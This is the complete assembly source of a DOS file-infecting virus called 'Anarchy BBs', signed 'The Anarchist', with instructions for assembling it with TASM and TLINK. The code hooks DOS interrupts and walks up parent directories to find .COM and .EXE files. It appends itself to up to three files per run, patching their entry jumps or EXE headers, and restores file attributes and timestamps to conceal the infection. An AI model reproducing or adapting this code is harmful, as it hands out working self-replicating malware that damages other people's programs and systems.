;File: ANARCHY.ASM ; Anarchy BBs by The Anarchist ; Call The Anarchy BBs at (215)926-9097 14,400 baud v32/v42 id = 'DA' .model tiny .code ; Assemble with: ; TASM /m3 filename.ASM ; TLINK /t filename.OBJ org 0100h carrier: db 0E9h,0,0 start: mov bp, sp int 0003h next: mov bp, ss:[bp-6] sub bp, offset next push ds push es mov ax, 3524h int 0021h push es push bx lea dx, [bp+INT24] ; ASSumes ds=cs mov ax, 2524h int 0021h push cs pop es push cs pop ds push cs pop es mov dl, 0000h lea si, [bp+offset origdir+1] mov ah, 0047h int 0021h mov ah, 001Ah lea dx, [bp+offset newDTA] int 0021h push ds push es mov ax, 3521h int 0021h push es pop ds xchg bx, dx mov ax, 2503h int 0021h pop es pop ds lea si, [bp+offset origCSIP] lea di, [bp+offset origCSIP2] movsw movsw movsw movsw mov byte ptr [bp+numinfect], 0000h traverse_loop: lea dx, [bp+offset COMmask] call infect lea dx, [bp+offset EXEmask] call infect cmp [bp+numinfect], 0003h jae exit_traverse mov ah, 003Bh lea dx, [bp+offset dot_dot] int 0003h jnc traverse_loop exit_traverse: lea si, [bp+offset origdir] mov byte ptr [si], '\' xchg dx, si mov ah, 003Bh int 0003h pop dx pop ds mov ax, 2524h int 0003h pop ds pop es mov dx, 0080h mov ah, 001Ah int 0003h cmp sp, id je restore_EXE restore_COM: mov di, 0100h push di lea si, [bp+offset old3_2] movsb movsb movsb return: ret restore_EXE: mov ax, ds add ax, 0010h add cs:[bp+word ptr origCSIP2+2], ax add ax, cs:[bp+word ptr origSPSS2] cli mov ss, ax mov sp, cs:[bp+word ptr origSPSS2+2] sti db 00EAh origCSIP2 db ? old3_2 db ?,?,? origSPSS2 dd ? origCSIP db ? old3 db 0cdh,20h,0 origSPSS dd ? INT24: mov al, 0003h iret infect: mov ah, 004Eh mov cx, 0007h findfirstnext: int 0003h jc return mov ax, 4300h lea dx, [bp+newDTA+30] int 0003h jc return push cx push dx mov ax, 4301h push ax xor cx, cx int 0003h lea dx, [bp+newDTA+30] mov ax, 3D02h int 0003h mov bx, ax mov ax, 5700h int 0003h push cx push dx lea dx, [bp+offset readbuffer] mov cx, 001Ah mov ah, 003Fh int 0003h xor dx, dx mov ax, 4202h xor cx, cx int 0003h cmp word ptr [bp+offset readbuffer], 'ZM' jz checkEXE mov cx, word ptr [bp+offset readbuffer+1] add cx, heap-start+3 cmp ax, cx jz jmp_close cmp ax, 65535-(endheap-start) ja jmp_close lea si, [bp+offset readbuffer] lea di, [bp+offset old3] movsw movsb mov cx, 0003h sub ax, cx mov word ptr [bp+offset readbuffer+1], ax mov dl, 00E9h mov byte ptr [bp+offset readbuffer], dl jmp short continue_infect checkEXE: cmp word ptr [bp+offset readbuffer+10h], id jnz skipp jmp_close: jmp close skipp: lea si, [bp+readbuffer+14h] lea di, [bp+origCSIP] movsw movsw sub si, 000Ah movsw movsw push bx mov bx, word ptr [bp+readbuffer+8] mov cl, 0004h shl bx, cl push dx push ax sub ax, bx sbb dx, 0000h mov cx, 0010h div cx mov word ptr [bp+readbuffer+16h], ax mov word ptr [bp+readbuffer+14h], dx mov word ptr [bp+readbuffer+0Eh], ax mov word ptr [bp+readbuffer+10h], id pop ax pop dx add ax, heap-start adc dx, 0000h mov cl, 0009h push ax shr ax, cl ror dx, cl stc adc dx, ax pop ax and ah, 0001h mov word ptr [bp+readbuffer+2], ax mov word ptr [bp+readbuffer+4], dx pop bx mov cx, 001Ah continue_infect: push cx mov cx, heap-start mov ah, 0040h lea dx, [bp+offset start] int 0003h xor cx, cx mov ax, 4200h xor dx, dx int 0003h lea dx, [bp+offset readbuffer] mov ah, 0040h pop cx int 0003h inc [bp+numinfect] close: mov ax, 5701h pop dx pop cx int 0003h mov ah, 003Eh int 0003h pop ax pop dx pop cx int 0003h mov ah, 004Fh jmp findfirstnext signature db '[The Anarchist]',0 creator db 'The Anarchist',0 virusname db '[Anarchy BBs]',0 EXEmask db '*.EXE',0 COMmask db '*.COM',0 dot_dot db '..',0 heap: newDTA db 43 dup (?) origdir db 65 dup (?) numinfect db ? readbuffer db 1ah dup (?) endheap: end carrier